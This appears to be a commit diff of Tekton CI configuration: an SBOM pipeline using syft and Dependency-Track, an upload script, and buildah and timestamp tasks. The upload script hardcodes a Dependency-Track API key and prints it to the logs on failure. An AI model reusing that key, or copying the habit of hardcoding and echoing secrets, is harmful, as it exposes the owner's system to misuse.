metadata:
name: generate-and-push-sbom
spec:
description: |
This pipeline generates an sbom with syft and pushes the sbom to deptrack
params:
- name: image-reference
type: string
- name: deptrack-url
type: string
- name: deptrack-projectName
type: string
- name: deptrack-projectVersion
type: string
- name: deptrack-options
type: array
- name: deptrack-apiKey
type: string
workspaces:
- name: shared-data
tasks:
- name: syft
taskRef:
name: syft
params:
- name: ARGS
value:
- $(params.image-reference)
- --output
- cyclonedx-json=./$(params.deptrack-projectName).sbom.json
workspaces:
- name: source-dir
workspace: shared-data
- name: push-sbom
runAfter: ["syft"]
taskref:
name: push-sbom
params:
- name: deptrack-url
value: $(params.deptrack-url)
- name: deptrack-apiKey
value: $(params.deptrack-apiKey)
- name: deptrack-projectName
value: $(params.deptrack-projectName)
- name: deptrack-projectVersion
value: $(params.deptrack-projectVersion)
- name: sbom
value: $(params.deptrack-projectName).sbom.json
workspaces:
- name: source-dir
workspace: shared-data

24
dev/tekton/tasks/sbom/upload-sbom.sh Executable file
View File

@@ -0,0 +1,24 @@
#!/usr/bin/env bash
export deptrackapiKey=odt_BRpq4el8T0XqdeunYMnefniaS0n8Yxd8
export deptrackprojectName=olproperties
export deptrackprojectVersion=1.1
export sbom=olproperties.sbom.json
if
curl -X POST "https://deptracka-dev.allarddcs.nl/api/v1/bom" \
-H 'Content-Type: multipart/form-data; boundary=__X_BOM__' \
-H "X-API-Key: $deptrackapiKey" \
-F "autoCreate=true" \
-F "projectName=$deptrackprojectName" \
-F "projectVersion=$deptrackprojectVersion" \
-F "bom=@olproperties.sbom.json" \
| grep "token"
then
echo "sbom uploaded succesfully"
else
echo $deptrackapiKey
echo $deptrackprojectName
echo $deptrackprojectVersion
echo $sbom
echo "upload sbom failed"
exit -1
fi

27
dev/tekton/tasks/syft-task.yaml Executable file
View File

@@ -0,0 +1,27 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
labels:
app.kubernetes.io/version: "0.1"
name: syft
spec:
description: CLI tool and library for generating a Software Bill of Materials from
container images and filesystems
params:
- description: The Arguments to be passed to Syft command.
name: ARGS
type: array
- default: docker.io/anchore/syft:v0.93.0
description: Syft image to be used
name: SYFT_IMAGE
type: string
steps:
- args:
- $(params.ARGS)
computeResources: {}
image: $(params.SYFT_IMAGE)
name: syft
workingDir: $(workspaces.source-dir.path)
workspaces:
- name: source-dir
optional: true

93
dev/tekton/tasks/timestamp/buildah.yaml Normal file
View File

@@ -0,0 +1,93 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: buildah
namespace: default
spec:
description: |-
Buildah task builds source into a container image and then pushes it to a container registry.
Buildah Task builds source into a container image using Project Atomic's Buildah build tool.It uses Buildah's support for building from Dockerfiles, using its buildah bud command.This command executes the directives in the Dockerfile to assemble a container image, then pushes that image to a container registry.
params:
- description: Reference of the image buildah will produce.
name: IMAGE
type: string
- default: quay.io/buildah/stable:v1.23.3
description: The location of the buildah builder image.
name: BUILDER_IMAGE
type: string
- default: overlay
description: Set buildah storage driver
name: STORAGE_DRIVER
type: string
- default: ./Dockerfile
description: Path to the Dockerfile to build.
name: DOCKERFILE
type: string
- default: .
description: Path to the directory to use as context.
name: CONTEXT
type: string
- default: "true"
description: Verify the TLS on the registry endpoint (for push/pull to a non-TLS
registry)
name: TLSVERIFY
type: string
- default: oci
description: The format of the built container, oci or docker
name: FORMAT
type: string
- default: ""
description: Extra parameters passed for the build command when building images.
name: BUILD_EXTRA_ARGS
type: string
- default: ""
description: Extra parameters passed for the push command when pushing images.
name: PUSH_EXTRA_ARGS
type: string
- default: "false"
description: Skip pushing the built image
name: SKIP_PUSH
type: string
results:
- description: Digest of the image just built.
name: IMAGE_DIGEST
type: string
- description: Image repository where the built image would be pushed to
name: IMAGE_URL
type: string
steps:
- computeResources: {}
image: $(params.BUILDER_IMAGE)
name: build
script: |
[[ "$(workspaces.sslcertdir.bound)" == "true" ]] && CERT_DIR_FLAG="--cert-dir $(workspaces.sslcertdir.path)"
[[ "$(workspaces.dockerconfig.bound)" == "true" ]] && export DOCKER_CONFIG="$(workspaces.dockerconfig.path)"
buildah ${CERT_DIR_FLAG} --storage-driver=$(params.STORAGE_DRIVER) bud \
$(params.BUILD_EXTRA_ARGS) --format=$(params.FORMAT) \
--tls-verify=$(params.TLSVERIFY) --no-cache \
-f $(params.DOCKERFILE) -t $(params.IMAGE) $(params.CONTEXT)
[[ "$(params.SKIP_PUSH)" == "true" ]] && echo "Push skipped" && exit 0
buildah ${CERT_DIR_FLAG} --storage-driver=$(params.STORAGE_DRIVER) push \
$(params.PUSH_EXTRA_ARGS) --tls-verify=$(params.TLSVERIFY) \
--digestfile /tmp/image-digest $(params.IMAGE) \
docker://$(params.IMAGE)
cat /tmp/image-digest | tee $(results.IMAGE_DIGEST.path)
echo -n "$(params.IMAGE)" | tee $(results.IMAGE_URL.path)
securityContext:
privileged: true
volumeMounts:
- mountPath: /var/lib/containers
name: varlibcontainers
workingDir: $(workspaces.source.path)
volumes:
- emptyDir: {}
name: varlibcontainers
workspaces:
- name: source
- name: sslcertdir
optional: true
- description: An optional workspace that allows providing a .docker/config.json
file for Buildah to access the container registry. The file should be placed
at the root of the Workspace with name config.json.
name: dockerconfig
optional: true

7
dev/tekton/tasks/timestamp/timestamp-pipeline-run.yaml Normal file
View File

@@ -0,0 +1,7 @@
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
generateName: timestamp-
spec:
pipelineRef:
name: timestamp

11
dev/tekton/tasks/timestamp/timestamp-pipeline.yaml Normal file
View File

@@ -0,0 +1,11 @@
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: timestamp
spec:
workspaces:
- name: shared-workspace
tasks:
- name: timestamp
taskRef:
name: timestamp

21
dev/tekton/tasks/timestamp/timestamp-task.yaml Normal file
View File

@@ -0,0 +1,21 @@
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
name: timestamp
spec:
results:
- name: timestamp
steps:
- name: timestamp
image: busybox
script: |
#!/bin/sh
# Get the current date-time in YYYYMMDD_HHMMSS format
TIMESTAMP=$(date +"%d%h%m%s")
echo $TIMESTAMP > $(results.timestamp.path)
echo "TIMESTAMP= " $TIMESTAMP
if [[ "$TIMESTAMP" =~ ^[a-zA-Z0-9_.-]+$ ]]; then
echo "TIMESTAMP is valid"
else
echo "TIMESTAMP is invalid"
fi